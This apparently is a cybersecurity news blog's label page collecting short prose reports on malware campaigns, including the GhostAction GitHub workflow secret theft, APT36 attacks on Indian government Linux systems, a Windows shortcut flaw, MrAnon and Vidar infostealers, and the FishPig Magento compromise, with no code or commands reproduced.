Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Malicious Files. Show all posts
Malware Attack
Cyber Attacks Cyber Hackers Data Leak data security Data Transfer Database Security GitHub leaked sensitive data Malicious Files Malware Attack

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

 

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced initial signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or manual dispatch, enabling the attackers to extract sensitive information. 

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.
Read more »
Transparent Tribe
Cyber Attacks Indian Government Linux OS Malicious Files Pakistan Hacker Transparent Tribe

Transparent Tribe Target Indian Government's Custom Linux OS with Weaponized Desktop Files

 

Transparent Tribe, a cyber-espionage group believed to originate from Pakistan and also known as APT36, has stepped up its attacks on Indian government entities by using malicious desktop shortcuts designed to compromise both Windows and BOSS Linux systems. 

The latest tactics involve spear-phishing emails featuring fake meeting notices. These emails contain desktop shortcut files disguised as PDF documents (e.g., “Meeting_Ltr_ID1543ops.pdf.desktop”). When recipients attempt to open what appears to be a typical PDF, they instead activate a shell script that initiates the attack chain. 

The malicious script fetches a hex-encoded file from an attacker-controlled domain (“securestore[.]cv”), decodes it to an ELF binary, and saves it to the target computer's disk. During this process, the victim is shown a decoy PDF hosted on Google Drive, launched in Firefox, to avoid suspicion.

The dropped Go-based ELF binary then connects to a command-and-control (C2) server (“modgovindia[.]space:4000”), allowing attackers to issue commands, deliver additional malicious payloads, and steal sensitive data. 

Transparent Tribe’s campaign ensures persistence by setting up a cron job that automatically runs the main payload after reboots or process terminations. The malware is equipped with reconnaissance capabilities and includes dummy anti-debugging and anti-sandbox techniques to dodge detection by analysts and automated analysis platforms.

A known backdoor associated with the group, Poseidon, is deployed for deeper intrusion. Poseidon enables long-term access, data exfiltration, credential theft, and lateral movement within compromised environments. 

CloudSEK and Hunt.io, two cybersecurity firms, reported that this sophisticated campaign reflects APT36’s ongoing adaptation—modifying attacks based on the victim's operating system to maximize the success rate and persistence. 

In recent weeks, similar attacks by Transparent Tribe targeted Indian defense organizations using spoofed login pages intended to collect credentials and two-factor authentication (2FA) codes, especially the Kavach 2FA system widely adopted within Indian government agencies. 

The phishing pages, designed to closely resemble official Indian government sites, prompt users to enter both their email credentials and Kavach code. Typo-squatted domains and Pakistan-based infrastructure are consistently used, aligning with the group’s established tactics. 

Recent campaigns have also targeted countries such as Bangladesh, Nepal, Pakistan, Sri Lanka, and Turkey using spear-phishing emails that mimic governmental communication and leverage lookalike pages for credential theft. Another South Asian group, SideWinder, has employed similar techniques, using fake Zimbra and portal pages to gather government users’ login information, illustrating the widespread threat landscape in the region.
Read more »
Zero-day Flaw
Malicious Files nation-state hackers Threat Landscape Vulnerabilities and Exploits Zero-day Flaw

Windows Shortcut Vulnerability Exploited by 11 State-Sponsored Outfits

 

Since 2017, at least 11 state-sponsored threat groups have actively exploited a Microsoft zero-day issue that allows for abuse of Windows shortcut files to steal data and commit cyber espionage against organisations across multiple industries. 

Threat analysts from Trend Micro's Trend Zero Day Initiative (ZDI) discovered roughly 1,000 malicious.lnk files that exploited the flaw, known as ZDI-CAN-25373, which allowed cyber criminals to execute concealed malicious commands on a victim's PC via customised shortcut files.

“By exploiting this vulnerability, an attacker can prepare a malicious .lnk file for delivery to a victim,” researchers at Trend Micro noted. “Upon examining the file using the Windows-provided user interface, the victim will not be able to tell that the file contains any malicious content.”

The malicious files delivered by cybercriminals include a variety of payloads, including the Lumma infostealer and the Remcos remote access Trojan (RAT), which expose organisations to data theft and cyber espionage. 

State-sponsored outfits from North Korea, Iran, Russia, and China, as well as non-state actors, are among those behind the flaw attacks, which have affected organisations in the government, financial, telecommunications, military, and energy sectors across North America, Europe, Asia, South America, and Australia. 

Additionally, 45% of attacks were carried out by North Korean players, with Iran, Russia, and China each accounting for approximately 18%. Some of the groups listed as attackers are Evil Corp, Kimsuky, Bitter, and Mustang Panda, among others.

According to Trend Micro, Microsoft has not fixed the flaw despite receiving a proof-of-concept exploit through Trend ZDI's bug bounty program. Trend Micro did not react to a follow-up request for comment on their flaw detection and submission timeline.

Microsoft's position remains that it will not be fixing the vulnerability described by Trend Micro at this time because it "does not meet the bar for immediate servicing under our severity classification guidelines," though the company "will consider addressing it in a future feature release," according to an email from a Microsoft spokesperson.

Meanwhile, Microsoft Defender can detect and block threat behaviour, as detailed by Trend Micro, and Microsoft's Windows Smart App Control prevents malicious files from being downloaded from the internet. Furthermore, Windows recognises shortcut (.lnk) files as potentially malicious file types, and the system will automatically display a warning if a user attempts to download one.
Read more »
Phishing Campaign
Data Privacy Info Stealer Malicious Files malware Phishing Campaign

MrAnon Stealer Propagates via Email with Fake Hotel Booking PDF

 

FortiGuard Labs cybersecurity experts have discovered a sophisticated email phishing scheme that uses fraudulent hotel reservations to target unsuspecting victims. The phishing campaign involves the deployment of an infected PDF file, which sets off a chain of actions that culminates in the activation of the MrAnon Stealer malware. 

The attackers, as initially reported by Hackread, conceal themselves as a hotel reservation company rather than depending on complicated technical means. They send phishing emails with the subject "December Room Availability Query," which contain fake holiday season booking details. A downloader link included within the malicious PDF file initiates the phishing attempt. 

Following an investigation, FortiGuard Labs experts discovered a multi-stage process involving.NET executable files, PowerShell scripts, and fraudulent Windows Form presentations. The attackers expertly navigate through these steps, using techniques such as fake error messages to mask the successful execution of the MrAnon Stealer malware. 

The MrAnon Stealer runs in the background, employing cx-Freeze to compress its actions and bypass detection measures. Its meticulous approach includes screenshot capture, IP address retrieval, and sensitive information retrieval from various applications. 

MrAnon Stealer, according to FortiGuard Labs, can steal information from bitcoin wallets, browsers, and messaging apps such as Discord, Discord Canary, Element, Signal, and Telegram Desktop. It specifically targets VPN clients such as NordVPN, ProtonVPN, and OpenVPN Connect. The attackers employ a Telegram channel as a means of exchange for command and control. Using a bot token, the stolen data is sent to the attacker's Telegram channel, along with system information and a download link.

As evidenced by the spike of requests for the downloader URL in November 2023, this malware campaign was aggressive and actively running, with a primary target on Germany. The hackers demonstrated a calculated strategy by switching from Cstealer in July and August to the more potent MrAnon Stealer in October and November. 

Users are strongly advised to take cautious, especially when dealing with unexpected emails containing suspicious files, as online vulnerabilities are at an all-time high. Vigilance and common sense are the keys to thwarting cybercriminal activities because they safeguard against the exploitation of human flaws and ensure online security.
Read more »
Threat actors
Android Security Cyber Security Kaspersky Malicious Files Ransomware Threat actors

Threat Actors Distribute Around 400K Malicious Files Every-day to Attack Users


According to one of the latest reports, nearly 4,00,000 new malicious files were apparently distributed every day by threat actors in the year 2022, in order to deceive and attack online users. The report shows a significant 5 percent growth compared to the 2021 data of the same. 

An estimate shared by cybersecurity company Kaspersky reports that almost 3,80,000 of these malicious files were detected daily in 2021, and 122 million harmful files were detected in 2022, an increase of six million from the year before. 

“Considering how quickly the threat landscape is expanding its boundaries and the number of new devices appearing in users' daily lives, it's quite possible that next year we'll be detecting not 4,00,000 malicious files per day, but half a million,” says Vladimir Kuskov, head of anti-malware research, Kaspersky. 

"Even more dangerous is that, with the development of Malware-as-a-Service, any novice fraudster can now attack devices without any technical knowledge in programming," Kuskov continues. 

The research conducted by Kaspersky indicates that the estimated number of ransomwares detected every day grew by 181%, encrypting 9,500 files every day. This is in comparison to the year 2021.  

Kaspersky as well detected a 142 percent hike in the number of Downloaders, which are malware programs designed in order to install malicious and unwanted applications in a device. Windows, among all platforms, remained the most common platform used by threat actors that are affected by the threat families. 

Experts at Kaspersky, on the other hand, have detected 3,20,000 new malicious files that are responsible for attacks on Windows devices, in 2022, the report added.

Moreover, the Kaspersky experts have witnessed a 10 percent hike in the distribution of malicious files, attacking Android platforms and devices each day in the year 2022.  

Read more »
Sites
Extensions FishPig Malicious Files malware Sites

Malware Spreads Through FishPig Distribution Server to Infect Magento-Powered Stores

 

For several weeks, Magento stores have been infected with malware as a result of a supply chain attack on the FishPig distribution server. FishPig specialises in Magento optimizations and Magento-WordPress integrations, and its Magento extensions have received over 200,000 downloads. FishPig issued a warning on Tuesday about an intrusion into its extension licence system that resulted in a threat actor injecting malicious PHP code into the Helper/License.php file. 

“This file is included in most FishPig extensions so it is best to assume that all FishPig modules had been infected,” FishPig announced.

The hackers likely had access to the company's servers since at least August 6, according to the company. As per Sansec security researchers who discovered the intrusion, the injected code would install another piece of malware called Rekoobe, which would hide as a background process on the compromised servers.

Sansec further told that the malicious code injected into License.php would download a Linux binary from license.fishpig.co.uk every time the Fishpig control panel is accessed in the Magento backend. The downloaded file, named 'lic.bin,' appears to be a licenced asset, but it is actually the Rekoobe remote access trojan.

The trojan removes all malicious files from the infected machine after execution, but it remains in memory, impersonating a system service while waiting for instructions from its command and control (C&C) server, according to the researchers. FishPig claims that the malicious code has been removed from its servers and that all modules have been updated.

“It is recommended to upgrade all FishPig modules or reinstall existing versions from the source, regardless of whether or not you are using extensions known to be infected. This will ensure clean and secure code on your system,” FishPig announced.
Read more »
Wiper
Cyber Attacks DDOS Attacks EU Malicious Files NCSC Russia-Ukraine War Spyware Attack Wiper

Russia Dubbed as the "Centre" of European-wide Cyber-Attacks

 

Since the beginning of Russia's invasion of Ukraine, the EU, UK, US, and other allies have recognized that Russia has been behind a wave of cyber-attacks. The most recent distributed denial-of-service (DDoS) attack on Viasat's commercial communications network in Ukraine, which occurred on the same day that Russia launched its full-fledged invasion, had a greater impact across Europe, disrupting wind farms and internet users. 

The outage on Viasat affected almost one-third of bigblu's 40,000 users throughout Europe, including Germany, France, Hungary, Greece, Italy, and Poland, according to Eutelsat, the parent company of bigblu satellite internet service. The incident impacted wind farms and internet users in central Europe, creating outages for thousands of Ukrainian customers. 

In the regard, the key statements by the West are as follows:

  • The European Union said that Russia was behind the strike, which occurred "one hour before" the invasion of Ukraine. 
  • Estonia: The member of the European Union went even further. With "high certainty," the country blamed the hack on Russia's military intelligence arm, saying it had "gone counter to international law." 
  • The United Kingdom's National Cyber Security Centre is "almost convinced" that Russia was behind the Viasat attack, according to the UK, citing "new UK and US intelligence." Meanwhile, the report said that "Russian Military Intelligence was probably certainly involved" in defacing Russian websites and releasing damaging spyware.
The main aim, according to the joint intelligence advisory, was the Ukrainian military. "Thousands of terminals have been destroyed, rendered useless, and are unable to be restored," according to Viasat. Russian military intelligence was likely certainly engaged in the January 13 attacks on Ukrainian official websites and the distribution of Whispergate harmful malware, according to the UK's National Cyber Security Centre (NCSC). 

"This is clear and alarming proof of an intentional and malicious attack by Russia against Ukraine, which had huge ramifications for ordinary people and businesses in Ukraine and across Europe," Foreign Secretary Liz Truss said. 

In the past Russian criminals hijacked the updater system of Ukrainian accounting software provider MEDoc in June 2017, infecting MEDoc users with the wiper virus NotPetya. The evidence suggests that Wiper malware infected several Ukrainian government networks again in 2022, and Gamaredon attacks targeted roughly 5,000 entities, including key infrastructure and government departments.

NCSC director of operations Paul Chichester addressed why the attribution was being done now, two and a half months after the occurrence, at a press conference at CYBERUK 2022. "We execute attributions in a process-driven manner; accuracy is extremely essential to us," he explained. Collaboration with international bodies such as the EU and the Five Eyes adds to the length of time it took to provide this material. 

Such cyber action aims to demoralize the public and degrade essential infrastructure. The perceived difficulties of precisely attributing the attack to any single aggressor is a benefit of conducting the earliest stages of kinetic activity in cyberspace. Putin has been emphatic in his denial of any Russian government participation in the attacks.
Read more »
Spyware
Malicious Files malware Phishing Camapign Spyware

Vidar Spyware Exploits Microsoft Help Files to Bypass Detection

 

Vidar spyware has been discovered in a new phishing campaign that exploits Microsoft HTML help files. The spyware is hidden in Microsoft Compiled HTML Help (CHM) files to bypass detection in email spam campaigns, Trustwave cybersecurity expert Diana Lopera stated. 

Vidar is Windows spyware and an information stealer capable of harvesting both user data and data on the operating system, cryptocurrency account credentials as well as payment details such as credit card details. 

While threat actors often distribute malware via spam and phishing campaigns, Trustwave researchers have also uncovered the C++ malware being deployed via the pay-per-install PrivateLoader dropper, and the Fallout exploit kit. 

According to researchers, threat actors employ an age-old strategy of tricking people to download seemingly innocent files that are actually malicious. The malicious files contain a generic subject line and an attachment, "request.doc," which is actually a .iso disk image. The .iso contains two separate files: a Microsoft-compiled HTML help file (CHM), often titled pss10r.chm, and an executable file titled app.exe. 

The CHM format is a Microsoft online extension file used for accessing documentation and help files. The compressed HTML format allows the distribution of images, tables and links. However, when malicious actors abuse CHM, they can use the format to force Microsoft Help Viewer (hh.exe) to deploy CHM objects. 

When a malicious CHM file is unpacked, a JavaScript snippet will silently execute app.exe, and while both files have to be in the same directory, this can trigger the execution of the Vidar payload. 

The Vidar samples gathered by the attacker’s link to their command-and-control (C2) server via Mastodon, a multi-platform open-source social networking system. Specific profiles are searched, and C2 addresses are collected from user profile bio sections. This allows the spyware to design its configuration and start exfiltrating user data. 

To protect yourself against this campaign, you should strictly follow the standard protections against email spam, such as ensuring the source of email before downloading any attachments. It's also a good idea to use the best antivirus software to protect your PC. 

"Since this Vidar campaign utilizes social engineering and phishing, ongoing security awareness training for your staff is essential. Organizations should also consider implementing a secure email gateway for 'defense in depth' layered security in order to filter these types phishing attacks before they even get to any inboxes,” stated Karl Sigler, Trustwave threat intelligence manager. 

"Vidar itself is an information stealer type of malware. It grabs as much data as it can from the victim's system, sends it back to the attackers, and then deletes itself. This includes any local password stores, web browser cookies, crypto wallets, contact databases, and other types of potentially valuable data."
Read more »
Subscribe to: Posts (Atom)